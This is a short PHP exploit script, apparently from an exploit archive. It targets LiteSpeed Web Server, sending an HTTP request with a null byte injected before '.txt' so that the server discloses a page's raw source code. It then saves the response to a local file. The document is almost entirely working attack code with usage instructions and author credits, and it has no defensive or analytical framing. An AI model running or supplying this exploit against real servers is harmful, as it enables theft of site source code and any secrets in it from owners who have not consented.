LiteSpeed Web Server remote source code disclosure exploit.
bcb99e48c610810a045d2dcf91a050e6b439110fe6967c93efe01fbf0349d3f9
<?php
/*
* LiteSpeed Web Server Remote Source Code Disclosure Exploit
* Usage : php exploit.php domain.com /path
* example : php exploit.php burtay.org index.php
* Coded By Burtay
* Special Thanks RMx And Megaturks Crews
*/
echo "\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\n\nStarting\n";
$fp = fsockopen($argv[1], 80, $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br />\n";
}
else {
$out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";
$out .= "Host: ".$argv[1]."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$gelen = fgets($fp, 128);
$dosya = str_replace("/","-",$argv[2]);
$ac = fopen($argv[1]."-".$dosya,'ab');
fwrite($ac,$gelen);
fclose($ac);
}
echo "Dosya ".$dosya." adi ile kaydedildi\n";
echo "Coded By Burtay\n";
echo "Burtay.Org\n";
echo "Megaturks.Net\n";
fclose($fp);
}
?>